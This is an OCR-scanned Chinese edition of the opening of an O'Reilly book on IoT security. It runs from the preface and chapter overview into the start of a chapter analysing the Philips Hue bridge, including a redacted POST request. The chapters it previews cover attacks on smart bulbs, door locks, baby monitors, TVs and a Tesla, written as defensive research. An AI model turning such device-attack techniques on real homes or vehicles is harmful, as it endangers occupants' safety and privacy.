O' Reilly Media，lnc. 介 绍 


O' Reilly Media 通 过 图 书 、 杂 志 、 在 线 服 务 、 调 查 研究 和 会 议 等 方式 传播 创新 知识 。 自 1978 年 开始 ，O” Reilly 一 直 都 是 前 沿 发 展 的 见证 者 和 推动 者 。 超 级 极 客 们 正在 开 
创 着 未 来 ， 而 我 们 关注 真正 重要 的 技术 趋势 一 一 通过 放大 那些 “细微 的 信号 ”来 刺激 社会 对 新 科技 的 应 用 。 作 为 技术 社区 中 活跃 的 参与 者 ，O” Reilly 的 发 展 充满 了 对 创新 的 
倡导 、 创 造 和 发 扬 光 大 。 


O' Reilly 为 软件 开发 人 员 带 来 革命 性 的 “动物 书 ”; 创建 第 一 个 商业 网 站 (GNN) ; 组 织 了 影响 深远 的 开放 源 代码 峰会 ， 以 至 于 开源 软件 运动 以 此 命名 ; 创立 了 Make 
杂志 ， 从 而 成 为 DIY 革 命 的 主要 先锋 ; 公司 一 如 既往 地 通过 多 种 形式 缔结 信息 与 人 的 纽带 。O” Reilly 的 会 议和 峰会 集聚 了 众多 超级 极 客 和 高 瞻 远 瞩 的 商业 领袖 ， 共 同 描绘 出 开 
创新 产业 的 革命 性 思想 。 作 为 技术 人 士 获取 信息 的 选择 ，O” Reilly 现 在 还 将 先锋 专家 的 知识 传递 给 普通 的 计算 机 用 户 。 无 论 是 通过 书籍 出 版 ， 在 线 服务 或 者 面授 课程 ， 每 一 项 
O' Reilly 的 产品 都 反映 了 公司 不 可 动摇 的 理念 一 一 信息 是 激发 创新 的 力量 。 


业界 评论 


“O? Reilly Radar ZA o Ese," 


Wired 


“9O”Reily 和 凭借 一 系列 〈 真 希望 当初 我 也 想到 了 ) 非凡 想法 建立 了 数 百 万 美元 的 业务 。” 


Business 2.0 
"O' Reilly Conference 是 聚集 关键 思想 领袖 的 绝对 典范 。” 
一 一 CRN 


“一 本 O 〇 ”Reilly 的 书 就 代表 一 个 有 用 、 有 前 途 、 需 要 学 习 的 主题 。” 


Trish Times 


“Tim 是 位 特 立 独行 的 商人 ， 他 不 光 放眼 于 最 长 远 、 最 广阔 的 视野 并 且 切 实地 按照 Yogi Berra 的 建议 去 做 了 : “如 果 你 在 路 上 过 到 偏 路 口 ， 走 小 路 (岔路 ) 。” 回 顾 过 去 
Tim 似 乎 每 一 次 都 选择 了 小 路 ， 而 且 有 几 次 都 是 一 闪 即 逝 的 机 会 ， 尽 管 大 路 也 不 错 。” 


Linux Journal 


ABE 


n% 


Nitesh 用 简明 的 例子 阐述 了 物 联网 安全 理论 ， 向 读者 展示 了 一 个 真实 的 互联 设备 的 世界 ， 以 及 它们 要 面临 的 复杂 问题 。 


一 一 Brian Hanson， 安 全 主 


jk 


本 书 揭示 了 不 久 的 将 来 ， 数 十 亿 互 联 设备 可 能 会 遇 到 的 安全 漏洞 ， 并 向 消费 者 、 设 计 人 员 和 学 生 提 供 了 应 对 即将 到 来 的 安全 风险 的 指南 。 


Elias Houstis， 普 渡 大 学 和 塞 萨 利 大 学 名 誉 教授 


Nitesh 整 个 职业 生涯 都 处 于 信息 安全 领域 先进 技术 的 最 前 沿 ， 他 了 解 并 影响 着 企业 和 消费 者 。 在 木 书 中 ，Nitesh 阐 述 了 如 果 危 险 没有 在 设计 之 初 就 被 考虑 清楚 ， 那 么 潜在 的 
问题 将 会 对 主流 社会 产生 重大 的 影响 。 


Lee J. Kushner, LJ Kushner&Associates Z- 8] i 23, 


针对 物 联 网 的 攻击 将 会 主宰 未 来 几 年 的 头条 新 闻 。 有 些 人 会 对 其 进行 过 度 的 炒作 ， 有 些 人 则 会 慕 观 失望 。 本 书 直截了当 地 深入 到 物 联网 设备 分 析 与 攻击 的 世界 当中 。 


— Haroon Meer, "Thinkst Applied Reseatch 创 始 人 


伴随 互联 设备 不 断 扩散 的 趋势 ， 社 会 对 其 关注 度 也 不 断 提高 ，Nitesh 以 真实 的 例子 ， 为 我 们 展示 了 在 互联 世界 中 ， 我 们 将 会 遇 到 的 挑战 。 对 我 们 将 要 面 对 依 赖 的 设备 提出 
了 发 人 深 省 的 思考 。 


Billy Rios，Whitescope.io 创 始 人 


本 书 给 出 了 针对 物 联网 攻击 的 样 例 和 具体 步骤 ， 指 出 我 们 怎样 才能 避免 过 去 犯 过 的 错误 。 物 联网 设备 连接 着 我 们 真实 的 物理 世界 ， 因 而 安全 漏洞 所 带 来 的 后 果 很 可 能 是 巨 
大 的 。 


Gustavo Rodriguez-Rivera， 普 渡 大 学 计算 机 科学 系 讲师 


对 下 一 代 联 网 设备 的 威胁 和 安全 感 兴趣 的 人 来 说 ， 本 书 是 一 个 很 好 的 起 点 。Nitesh 给 出 了 大 量 的 研究 案例 ， 从 导致 “智能 ”照明 系统 停电 到 远程 定位 和 解锁 特 斯 拉 电 动 汽 
车 ， 只 需要 用 一 些 20 世 纪 90 年 代 流行 的 小 伎俩 和 技术 就 能 做 到 。 在 本 书 中 ，Nitesh 不 仅 清 晰 地 为 我 们 解释 了 物 联网 设备 高 层次 的 设计 缺陷 ， 还 描绘 了 低层 次 的 技术 实现 故障 。 
对 我 来 讲 ， 我 恪守 的 一 条 信息 安全 格言 是 “江山 易 改 ， 本 性 难 移 ”。 


Saumil Shah ，Net-Squate 公 司 首 席 执行 官 


任何 联网 设备 都 有 遭遇 黑客 攻击 的 风险 ， 由 于 我 们 的 汽车 、 家 居 设 备 等 都 在 逐渐 变 得 智能 化 ，“ 被 黑 ” 的 风险 也 就 进一步 加 剧 。 早 在 几 年 前 ， 人 们 对 物 联网 的 迅猛 发 展 就 
已 有 预测 。 随 着 物 联网 的 概念 越 来 越 热 ， 市 面 上 出 现 了 大 量 基 于 物 联网 开发 的 连接 设备 : 从 与 人 们 生活 密切 相关 的 空调 系统 、 洗 衣 机 等 家 庭 设备 ， 到 与 生命 密切 相关 的 家 庭 安 
全 摄像 头 、 婴 儿 监 视 器 、 心 脏 起 搏 器 等 安全 与 卫生 设备 ， 再 到 与 人 们 健康 密切 相关 的 健身 追踪 器 、 智 能 手表 等 可 穿戴 设备 。 由 于 物 联网 设备 相对 来 说 比较 新 ， 无 论 是 硬件 设备 
还 是 与 之 配套 的 App 和 网 络 服务 都 鲜 有 安全 保护 措施 。 但 每 一 种 连接 设备 的 出 现 ， 都 为 人 们 的 生活 增添 了 些许 智能 ， 所 以 我 们 不 可 能 由 于 物 联网 具有 安全 隐患 就 拒绝 进入 物 联 
网 时 代 。 


本 书 并 非 是 一 本 关于 物 联 网 安全 知识 的 手册 ， 书 中 握 弃 了 “首先 介绍 概念 ， 其 次 提出 问题 ， 最 后 阐述 解决 方法 ”这 种 “八股 文 ” 似 的 描述 方法 ， 而 是 以 一 个 个 鲜 活 的 例 
子 ， 从 当前 市 面 上 比较 流行 的 物 联网 设备 入 手 ， 深 入 研究 这 些 设备 的 设计 思路 和 架构 ， 向 读者 呈现 了 现实 生活 中 我 们 可 能 会 遭遇 到 的 安全 威胁 和 安全 漏洞 ， 帮 助 我 们 了 解 真实 
的 物 联 网 世界 里 攻击 者 的 战术 和 心理 ， 从 而 学 会 如 何 保护 自己 ， 同 时 本 书 也 可 以 提醒 物 联网 设备 厂商 改善 他 们 的 设计 和 产品 。 


可 以 说 ， 现 在 的 物 联 网 大 环境 是 不 安全 的 ， 由 于 厂商 和 安全 专业 人 员 认 为 物 联网 设备 安全 的 优先 级 较 低 ， 他 们 几乎 没有 做 什么 工作 来 确保 物 联网 设备 的 安全 。 从 这 个 角度 
来 说 ， 物 联网 设备 的 安全 任 重 而 道 远 。 


本 书 的 翻译 组 织 工作 由 绿 纶 全 面 负责 。 第 1、3、5、7 章 由 林 林 译 校 ， 第 2、4、6 章 由 陈 焊 译 校 ， 前 言及 第 8、9 章 由 兢 姬 君 译 校 。 


本 书 在 翻译 过 程 中 力求 准确 流畅 ， 但 纶 漏 之 处 在 所 难免 ,欢迎 广大 读者 批评 指正 。 若 有 关于 本 书 的 任何 意见 和 想法 ， 请 发 送 邮 件 至 lunmiao@tom.com， 让 我 们 共同 探讨 。 


译 者 


2016 年 8 月 于 北京 


序 


非常 高 兴 听 到 我 的 朋友 Nitesh Dhanjani 正 在 写 一 本 关于 物 联网 (loT) 的 图 书 。 这 是 一 个 让 我 既 兴 奋 又 害怕 的 领域 。 


安全 漏洞 是 现在 新 闻 每 天 都 会 谈论 的 事情 。 违 规 行为 的 频率 和 规模 让 我 有 些 麻木 。 随 着 社会 现代 化 的 发 展 ， 至 少 在 短期 内 ， 我 们 不 得 不 接受 我 们 从 创新 技术 获得 的 利益 超 
过 它们 所 带 来 的 花费 和 风险 这 个 事实 。 但 是 我 们 并 没有 从 根本 上 做 些 什么 以 改变 这 种 不 安全 的 模式 ， 只 是 根据 表面 迹象 来 评估 利益 大 于 风险 。 


“利益 大 于 风险 ”定式 的 关键 是 过 去 所 表现 出 来 的 风险 几乎 是 看 不 到 的 ， 这 些 涉及 信息 和 金钱 。 现 在 ,我 们 假设 后 果 是 真实 存在 的 ， 如 城市 陷入 一 片 黑暗 之 中 ， 医 疗 器 械 
开始 杀害 患者 ， 冰 箱 使 食物 变质 ,司机 失去 对 汽车 的 控制 能 力 ， 飞 机 从 空中 坠落 ， 等 等 。 我 们 是 否 还 会 像 现在 这 样 容忍 技术 上 的 失败 ? 


我 怀疑 ， 我 们 对 风险 的 观念 已 经 演变 成 只 看 表面 结果 而 忽略 了 隐形 、 抽 象 的 风险 。 可 能 的 一 个 原因 是 : 对 很 多 人 来 说 ， 信 息 安 全 风险 很 难 概念 化 。 我 还 怀疑 ， 当 信息 安全 
完全 暴露 出 它们 的 本 质 时 ， 我 们 会 重新 思考 物 联网 带 来 的 风险 。 


在 “现实 世界 ”中 ， 许 多 建筑 条 款 限 定 了 物理 建筑 的 要 求 ， 需 要 注册 工程 师 和 检察 员 来 确保 遵守 和 问 责 。 世 界 上 有 着 成 二 上 万 台 连 接着 的 设备 ， 什 么 时 候 我 们 会 考虑 这 些 
安全 性 ? 


我 仅 希望 那些 阅读 本 书 的 人 能 够 意识 到 ， 由 于 物 联网 的 存在 ， 革 新 进程 所 依赖 的 技术 投资 周期 应 当 重新 考虑 。 为 了 加 速 创新 、 降 低 成 本 、 缩 短 产 品 生产 周 期 而 开发 的 应 用 
软件 和 质量 控制 程序 已 经 不 能 阻止 我 们 的 安全 和 隐私 被 进一步 地 侵犯 。 


Patrick Heim 


Patrick Heim 是 一 位 资深 的 信息 安全 专业 人 士 ， 有 着 20 年 的 工作 经 验 ， 曾 担任 审计 员 、 咨 询 员 、 渗 透 测试 员 、 首 席 信 任官 和 首席 信息 安全 官 等 。 


即将 到 来 的 物 联网 时 代 ， 会 使 实际 生活 和 线 上 生活 的 界限 越 来 越 模糊 。 在 未 来 ， 攻 击 我 们 的 线 上 空间 会 威胁 到 我 们 的 人 身 安 全 。 按 照 传统 方式 ， 攻 击 物理 设施 需要 物理 上 
的 接触 ， 而 互联 网 突破 了 这 一 限制 。 未 来 ， 这 一 情况 将 被 数 百 亿 连 接 入 因特网 的 “ 物 ” 所 破坏 。 

在 本 书 中 ， 我 们 将 采取 一 种 有 趣 的 方式 看 一 看 市 场 上 已 有 的 基于 物 联网 的 流行 设备 可 能 被 滥用 的 情况 。 我 们 将 探讨 简单 的 攻击 如 何 使 [ED 灯泡 永久 停电 ， 糟 糕 的 安全 策略 
如 何 使 家 庭 物理 安全 和 隐私 受到 侵犯 ， 以 及 不 安全 的 电动 汽车 将 如 何 导致 生命 面临 危险 。 


本 书 的 目的 是 展示 物 联网 设备 所 存在 的 实 实在 在 的 风险 ， 随 着 时 间 的 推移 ， 我 们 会 越 来 越 依赖 这 些 设备 。 今 天 ， 只 有 了 解 了 设备 中 存在 的 安全 漏洞 的 本 质 原因 ， 我 们 才能 
打通 一 条 通 往 未 来 的 路 ， 这 将 帮助 我 们 更 安全 地 使 用 这 些 设 备 ， 服 务 于 我 们 的 生活 。 


恶意 攻击 者 已 经 在 致力 于 发 气 和 利用 这 些 安全 缺陷 ， 他 们 将 继续 寻找 各 种 能 够 找到 的 阴险 手段 来 滥用 自己 的 知识 。 这 些 攻 击 者 中 ， 有 好 奇 的 大 学 生 ， 也 有 私人 或 国家 资助 
的 犯罪 团伙 ， 他 们 经 验 丰富 ， 并 热 囊 于 恐怖 活动 。 物 联网 设备 的 安全 漏洞 可 能 会 导致 大 量 隐 私 外 泄 ， 并 造成 人 身 伤害 。 事 关 重 大 ! 


本 书 为 谁 而 写 


本 书 是 为 任何 有 兴趣 分 析 市 场 上 现 有 物 联网 设备 安全 漏洞 的 人 而 写 的 。 这 样 能 让 你 了 解 那些 忙 着 想 办 法 利用 这 些 设备 获 利 的 恶意 攻击 者 的 心态 。 了 解 物 联网 世界 的 恶意 实 
体 采 用 的 迁 回 战术 ， 会 让 你 更 深入 地 了 解 攻击 者 的 战术 和 心理 ， 这 样 不 仅 可 以 学 会 保护 自己 ， 也 有 助 于 设计 安全 的 物 联网 产品 。 


如 何 使 用 本 书 


本 书 分 成 下 面 几 章 : 


第 1 章 : 熄灯 一 一 攻击 无 线 灯泡 致使 持续 性 停电 


本 书 从 市 场 上 比较 流行 的 物 联网 产品 飞利浦 彩色 个 人 照明 系统 (http://meethue.com/) 入 手 ， 深 入 研究 其 设计 理念 和 体系 结构 。 该 章 呈 现 了 系统 中 存在 的 各 种 安全 问 
题 ， 包 括 基本 内 容 ， 例 如 口令 安全 ， 滥 用 弱 权 限 机 制导 致 恶意 软件 的 可 能 性 ， 最 终 引发 持续 停电 。 该 章 还 讨论 了 在 线 空间 (如 Facebook) 与 物 联网 设备 互 连 的 复杂 性 ， 以 及 
跨 多 个 平台 可 能 导致 的 安全 问题 。 


第 2 章 : 电子 援 锁 一 一 滥用 门 锁 危 害 物理 安全 


该 章 围绕 现 有 的 电子 门 锁 探 讨 安全 漏洞 、 无 线 机 制 ， 以 及 与 移动 设备 的 集成 。 我 们 也 展示 了 实际 的 案例 ， 研 究 那 些 已 经 采用 这 些 手段 进行 窃取 的 攻击 者 。 


第 3 章 : 袭击 无 线 护士 站 一 一 破坏 婴儿 监视 器 和 其 他 设施 
该 章 主 要 讲 了 远程 控制 婴儿 监视 器 的 安全 防御 。 我 们 会 探讨 已 经 被 攻击 者 滥用 的 真实 漏洞 的 细节 ， 并 且 指 出 简单 的 设计 缺陷 是 如 何 使 家 庭 成 员 面临 安全 风险 的 。 


第 4 章 : 模糊 的 界限 一 一 当 物 理 空间 遇 到 虚拟 空间 


像 smartThings 这 样 的 公司 会 售卖 一 系列 物 联网 设备 和 传感器 ， 这 些 设备 可 以 用 来 保护 家 庭 安 全 ， 例 如 ， 在 午夜 如 果 房 门 打开 了 ， 能 够 收 到 有 可 能 有 入 侵 者 的 通知 。 事 实 
上 ， 这 些 设备 使 用 因特网 来 操作 ， 增 加 了 我 们 对 网 络 连 接 的 依赖 ， 模 糊 了 我 们 的 物理 世界 和 网 络 虚拟 世界 之 间 的 界限 。 我 们 来 看 看 SmartThings 系 列 产品 的 安全 性 ， 并 探讨 它 
们 与 其 他 制造 商 的 设备 进行 安全 操作 是 如 何 设计 的 。 


第 5 章 : 傻瓜 盒子 一 一 攻击 “智能 ”电视 


如 今 ， 电 视 机 基本 上 都 运行 着 强大 的 操作 系统 ， 如 Linux。 它 们 连接 到 家 庭 WiFi 网 络 ， 支 持 观 看 流 视频 、 视 频 会 议 、 社 交 网 络 和 即时 消息 等 服务 。 该 章 研 究 了 三 星 电视 机 
实际 的 漏洞 ， 帮 助 我 们 了 解 缺 陷 发 生 的 根本 原因 ， 以 及 对 我 们 的 隐私 和 安全 性 的 潜在 影响 。 


第 6 章 : 联网 汽车 的 安全 性 分 析 一 一 从 燃油 汽车 到 全 电动 汽车 


现在 ， 汽 车 也 属于 能 够 被 远程 访问 和 控制 的 “ 物 ” 了 。 不 像 许多 其 他 设备 ， 汽 车 的 互联 可 以 起 到 重要 的 安全 作用 ， 但 是 汽车 的 安全 漏洞 会 导致 失去 生命 。 该 章 研究 了 低 范 
围 的 无 线 系统 ， 然 后 回顾 由 学 术 界 的 首席 专家 完成 的 广泛 研究 。 我 们 分 析 和 探讨 了 特 斯 拉 S 型 轿车 的 特性 ， 包 括 汽车 安全 性 方面 能 够 改进 的 地 方 。 


第 7 章 : 安全 原型 一 一 littleBits 和 cloudBit 


企业 设计 一 个 物 联网 产品 时 ， 首 先 要 创建 一 个 原型 确认 这 个 想法 是 可 行 的， 探索 可 选择 的 设计 理念 ， 并 建立 规范 形成 一 个 固定 的 商业 产品 。 在 最 初 的 原型 中 ， 设 计 安 全 性 
是 极其 重要 的 ， 随 后 会 二 加 到 最 终 产品 上 。 事 后 考虑 安全 性 势必 会 导致 最 终 产品 给 消费 者 带 来 安全 隐患 和 隐私 泄露 的 风险 。 该 章 我 们 使 用 littleBits 原 型 平台 设计 了 一 个 短信 门 
铃 原型 。cloudBit 模 块 可 帮助 我 们 实现 远程 无 线 连接 ， 这 样 可 以 将 物 联网 思想 原型 化 ， 按 下 门铃 就 会 给 用 户 传递 一 个 短 消 息 。 在 设计 原型 时 ， 讨 论 原型 步骤 需 考虑 安全 问题 和 
需求 ， 也 需要 讨论 应 当 由 产品 设计 师 来 解决 的 重要 安全 问题 。 


第 8 章 : 未 来 的 安全 一 一 对 话 将 来 的 攻击 方式 


在 接 下 来 的 几 年 里 ， 我 们 在 生活 中 对 物 联网 设备 的 依赖 势必 迅速 增长 。 在 该 章 ， 我 们 基于 对 未 来 物 联网 设备 如 何 服务 于 我 们 需求 的 理解 来 预测 可 能 的 攻击 。 


第 9 章 : 两 个 方案 一 一 意图 和 结果 


为 了 对 人 们 如 何 影 响 安 全 性 事件 获得 有 效 评估 ， 我 们 来 看 看 两 种 不 同 的 假设 情况 。 第 一 种 情况 ， 我 们 将 探索 如 何在 一 个 大 公司 试图 利用 围绕 在 物 联网 安全 周围 的 “只 
喻 ” 声 让 董事 会 印象 深刻 。 第 二 种 情况 ， 我 们 看 到 一 个 冉冉 升 起 的 物 联网 设备 提供 商 ， 为 了 保持 其 商业 信誉 ， 是 如 何 选择 去 接触 和 回应 研究 者 与 记者 的 。 该 章 的 最 终 目 的 是 要 
说 明 : 安全 相关 情景 的 结果 主要 是 受 关系 人 的 意图 和 行为 影响 的 。 


本 书 约定 

本 书 使 用 下 列 排版 约定 : 
斜体 

标示 新 的 术语 、URL、 电 子 邮 件 地 址 、 文 件 名 和 文件 扩展 名 。 
等 宽 字体 (Constant width) 


用 于 程序 清单 和 段落 中 引用 的 程序 元 素 ， 如 变量 或 函数 名 、 数 据 库 、 数 据 类 型 、 环 境 变 量 、 语 句 和 关键 字 。 


等 宽 粗 体 (Constant width bold) 
表示 命令 ， 或 者 应 该 由 用 户 直 接 键入 的 其 他 文本 。 


表示 提示 或 建议 


使 用 代码 样 例 


本 书 的 目的 是 帮助 你 完成 工作 。 一 般 情 况 下 ， 你 可 以 使 用 本 书 所 提供 的 样 例 代码 进行 编程 和 文档 撰写 。 不 需要 联系 我 们 获得 许可 ， 除 非 重 现代 码 的 重要 部 分 。 例 如 ， 使 用 


书 中 的 一 些 代码 段 进行 编写 程序 ， 无 需 获得 许可 。 销 售 或 发 行 来 自 9” eilly 图 书 的 光盘 实例 ， 需 要 获得 许可 。 引 用 本 书 和 引用 代码 实例 来 解决 问题 ， 无 需 获 得 许可 。 从 本 书 获 
取 大 量 的 样 例 代 码 到 你 的 产品 文档 ， 需 要 获得 许可 。 


我 们 感谢 你 的 署名 ， 但 不 会 强求 。 署 名 通常 包含 书 名 、 作 者 、 出 版 商 和 1SBN。 例 如 : “Abusing the Internet of Things by Nitesh Dhanjani (O' eilly) .Copyright 
2015Nitesh Dhanjani, 978-1-491-90233-2." 


如 果 你 觉得 你 使 用 的 代码 示例 超出 正当 使 用 或 上 面 给 出 的 权限 ， 请 随时 与 我 们 联系 : permissions@oreilly.com。 


如 何 联系 我 们 


如 果 你 对 本 书 有 意见 和 问题 ， 请 联系 出 版 商 : 
美国 : 
O'Reilly Media, Inc. 
1005Gravenstein Highway North 
Sebastopol, CA 95472 
中 国 : 
北京 市 西城 区 西直门 南大 街 2 号 成 铬 大 厦 C 座 807 室 (100035) 
奥 莱 利 技术 咨询 (北京 ) 有 限 公 司 
我 们 为 本 书 创建 了 网 页 ， 其 中 列 出 了 勘误 表 、 实 例 ， 以 及 任何 附加 信息 。 你 可 以 输入 http://bit.ly/abusing_loT 来 访问 页 面 。 
有 关 本 书 的 意见 和 技术 咨询 ， 请 发 邮件 到 bookquestions@oreilly.com。 
关于 我 们 的 书籍 、 课 程 、 会 议和 新 闻 的 更 多 信息 ， 可 参考 我 们 的 网 站 : 
http://www.oreilly.com 


http://www.oreilly.com.cn 
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第 1 章 ”熄灯 一 一 攻击 无 线 灯泡 致使 持续 性 停电 


发 生 于 2003 年 美国 东北 部 的 大 停电 事件 ， 造 成 了 非常 广泛 的 影响 ， 波 及 了 美国 整个 东北 部 和 中 西部 地 区 ， 以 及 加 拿 大 的 安大略 湖 。 大 约 4.5 亿 人 受 影响 长 达 两 天 之 久 。 单 
就 纽约 而 言 ， 据 报道 由 于 个 人 使 用 蜡烛 而 导致 的 火灾 达 3000 起 。 还 有 60 起 由 于 使 用 蜡烛 引发 的 火灾 报警 事故 ， 以 及 使 用 明火 照明 而 导致 的 两 起 恶性 死亡 事故 。 在 密歇根 ， 停 
电 期 间 使 用 蜡烛 引起 了 一 场 重大 火灾 ， 导 致 全 家 被 烧 。 


问题 的 惊人 之 处 并 不 在 于 发 生 了 东北 部 停电 这 一 事件 本 身 ， 而 在 于 这 一 事件 所 揭示 的 内 容 : 发 达 国 家 把 使 用 电 这 种 奢侈 资源 认为 是 理所当然 的 事情 ， 而 且 越 来 越 依 赖 于 这 
些 资源 。 当 这 些 基 本 奢侈 品 被 村 走 的 时 候 ， 我 们 就 要 反思 和 重视 这 种 过 分 依赖 了 。 扳 动 开 关 ， 我 们 希望 马上 就 能 看 到 电 火 焰 带 来 的 光明 。 打 开 冰 箱 ， 我 们 希望 食物 和 饮料 保存 
完好 。 走 进 家 门 ， 我 们 希望 空调 能 够 持续 且 自 动 地 给 予 我 们 冷 热 均衡 的 、 舒 适 的 温度 。 


大 约 100 年 前 ， 我 们 知道 了 如 何 产生 电 。 在 此 之 前 ， 屋 内 照明 使 用 煤油 灯 ， 取 暖 则 依靠 炉子 。 我 们 当前 对 电 的 依赖 程度 极其 惊人 ; 只 要 一 停电 ， 几 秒 钟 之 内 我 们 的 城市 和 
商业 马上 就 会 停止 运转 。 


美国 的 供电 系统 由 3 个 互联 的 输电 网 组 成 ， 并 向 全 国 输送 电力 : 东部 电气 互联 网 、 西 部 电气 互联 网 和 得 克 萨 斯 州 电气 互联 网 。 这 3 个 系统 以 设备 和 传输 系统 之 间 的 通信 互联 
在 一 起 ， 共 同 分 享 由 此 而 产生 的 更 大 的 发 电量 和 更 低 的 电价 所 带 来 的 利益 。 


发 达 国 家 很 明显 依赖 电网 来 维持 其 社会 经 济 和 市 民生 活 。 对 于 包括 发 电机 和 变压器 在 内 的 电网 来 说 ， 由 于 运用 计算 机 产生 了 大 量 的 新 技术 ， 可 使 计算 机 网 络 远 程 就 能 操控 
电网 设备 提供 的 功能 。 因 此 ， 应 该 高 度 重视 与 网 络 安 全 相关 的 威胁 。 


除了 需要 确保 电网 安全 之 外 ， 在 即将 到 来 的 面向 消费 的 时 代 ， 物 联网 (loT) 所 产生 的 额外 的 技术 生态 系统 也 需要 得 到 保护 : 物 联 网 产品 本 身 的 安全 需要 得 到 保证 。 今 
天 ， 能 够 通过 无 线 网 实时 远程 控制 、 可 替代 传统 灯泡 的 各 种 产品 已 经 在 市 场 上 出 现 。 我 们 在 家 里 和 办 公 室 安装 这 类 设备 时 ， 除 了 要 考虑 基础 设施 安全 (如 电网 安全 ) 之 外 ,也 
需要 确保 这 些 设 备 在 设计 上 的 安全 性 。 


本 章 我 们 会 深入 研究 一 款 在 市 场 上 很 流行 的 产品 (飞利浦 色调 个 人 照明 系统 ) 的 设计 和 架构 。 我 们 社会 的 便利 性 和 安全 性 都 依赖 于 照明 ， 因 此 ， 我 们 采用 这 一 领域 的 物 联 
网 产品 作为 开篇 第 1 章 的 重点 。 我 们 会 从 安全 的 视角 来 研究 一 下 这 个 产品 的 操作 和 通信 功能 ， 并 尝试 找到 安全 漏洞 。 只 有 通过 深入 的 分 析 ， 我 们 再 讨论 身边 的 安全 问题 才 更 可 
靠 ， 建 立 坚实 的 安全 性 框架 ， 并 学 会 如 何在 未 来 构建 安全 的 产品 。 


1.1 选用 色调 照明 设备 的 原因 


上 文中 ， 我 们 已 经 讨论 了 为 什么 照明 是 我 们 社会 文明 和 安全 中 最 重要 的 一 环 。 我 们 明确 选用 飞利浦 色调 个 人 照明 系统 作为 分 析 物 联网 安全 领域 的 设备 ， 是 因为 它 在 消费 市 
场 上 非常 受 欢迎 。 作 为 首 个 获得 普及 的 面向 物 联网 的 照明 产品 ， 飞 利 浦 色调 个 人 照明 系统 会 激发 其 他 竞争 产品 学 习 它 的 架构 和 设计 理念 。 因 此 ， 色 调 产 品 的 安全 性 分 析 将 会 帮 
助 我 们 对 当前 应 用 于 这 一 领域 的 物 联网 产品 的 安全 机 制 、 潜 在 漏洞 ， 以 及 未 来 安全 设计 的 必要 变化 有 一 个 很 深刻 的 了 解 。 


不 论 是 在 网 店 还 是 在 实体 店 ， 都 可 以 买 到 色调 照明 系统 。 如 图 1-1 所 示 ， 系 统 的 启动 包 包含 3 个 无 线 灯 泡 和 1 个 网 桥 。 可 通过 色调 网 站 或 者 iOS App 将 灯泡 配置 成 任意 的 
1600 万 种 颜色 。 


网 桥 使 用 以 太 网 线 缆 连 接 用 户 路 由 器 ， 用 以 建立 和 维持 与 色调 互联 网 设施 的 出 站 连接 ， 下 一 节 我 们 将 对 此 进行 详细 讨论 。 网 桥 使 用 ZigBee 协 议 直接 连接 至 LED 灯 泡 
上 ，ZigBee 协 议 是 建立 在 IEEE 802.15.4 标 准 基础 之 上 的 。ZigBee 是 一 种 低 成 本 、 低 功率 的 协议 ， 在 物 联网 设备 上 应 用 得 非常 广泛 ， 主 要 用 于 设备 之 间 的 通信 。 


用 户 访问 本 地 网 络 时 ，iOS 应 用 会 直接 连接 网 桥 ， 发 出 命令 改变 灯泡 的 状态 。 当 用 户 远程 访问 或 使 用 调 色 网 站 时 ， 命 令 会 由 经 由 调 色 互联 网 设施 发 出 。 


之 后 几 节 我 们 将 学 习 底 层 安全 架构 ， 了 解 其 实现 情况 并 发 现 设计 缺陷 。 这 有 助 于 我 们 对 当前 市 场 上 流行 的 面向 用 户 的 物 联网 照明 设备 的 安全 问题 有 一 个 深刻 的 理解 。 


图 1-1: 色调 照明 设备 的 启动 包 ， 包 括 1 个 网 桥 和 3 个 无 线 灯泡 


1.2 ”使 用 网 站 接口 控制 照明 


理解 底层 技术 架构 是 发 现 安全 漏洞 的 一 个 好 方法 ， 而 用 例 分 析 又 是 其 中 的 最 佳 途径 之 一 。 调 色 照 明 系 统 最 基本 的 用 例 是 通过 网 站 接口 ， 在 线 注册 一 个 账号 ， 并 将 网 桥 链接 
至 该 账号 下 。 一 旦 完成 注册 ， 用 户 就 能 够 使 用 她 的 账号 远程 控制 照明 。 本 节 ， 我 们 来 看 看 系统 是 如 何 将 用 户 账号 与 网 桥 关 联 起 来 的 ， 以 及 如 何在 网 站 上 控制 照明 。 当 我 们 明白 
了 这 一 用 例 设计 的 实现 原理 之 后 ， 就 会 讨论 相关 的 安全 问题 ， 以 及 如 何 利用 这 些 安全 漏洞 。 


首先 ， 每 个 用 户 都 必须 在 调 色 照明 门户 网 站 上 注册 一 个 免费 账号 ， 如 图 1-2 所 示 。 注 册 时 ， 用 户 需 要 提供 姓名 、 电 子 邮件 地 址 ， 并 创建 一 个 至 少 6 个 字符 长 的 密码 。 
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Create account 


Set everything up 


Off you go 


图 1-2: 调 色 照明 网 站 账户 注册 


第 二 步 ， 网 站 尝试 定位 本 地 网 桥 ， 并 将 网 桥 与 刚刚 创建 的 账号 关联 起 来 。 完 成 之 后 ， 网 站 会 显示 一 条 消息 “发 现 网 桥 ” (We found your bridge) ， 如 图 1-3 所 示 。 
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JOINING HUE ONLINE IS AS EASY AS 1, 2, 3 


Create account We found your bridge 


Set everything up 


Now just activate your bridge by pressing the big button in the middle. 


Off you go Help me GET STARTED 


I want to add my bridoe later 


图 1-3: 通过 网 站 关联 网 桥 


网 桥 按 设 定 会 主动 连接 调 色 照明 网 站 后 台 ， 并 广播 它 的 id (该 id 是 手工 分 配给 物理 网 桥 的 唯一 标识 符 ) 、 内 部 iP 地址 和 MAC 地 址 ， 所 以 网 站 知道 如 何 定位 网 桥 。 网 桥 通过 
向 dcs.cb.philips.com 网 站 发 送 一 个 POST 请 求 来 完成 这 一 步 ，POST 请 求 示 例如 下 : 


POST /Dcs.ConnectionServiceHTTP/1.0 

Host: dcs.cb.philips.com:8080 

Authorization: CBAuth Type-"SSO", Client-"[DELETED]", RequestNr-"16", 
Nonce-"[DELETED]", SSOToken-"[DELETED]", Authentication-" [DELETED] 
Content-Type: application/CB-MessageStream; boundary-ICPMimeBoundary 
Transfer-Encoding: Chunked 


304 

-—-ICPMimeBoundary 

Content-Type: application/CB-Encrypted; cipher-AES 
Content-Length:0000000672 


[DELETED] 


服务 器 端 响应 信息 如 下 : 


HTTP/1.0 200 OK 

WWW-Authenticate : CBAuth Nonce-" [DELETED]" 

Connection : close 

Content-Type : application/CB-MessageStream; boundary-"ICPMimeBoundary" 
Transfer-Encoding : Chunked 


001 


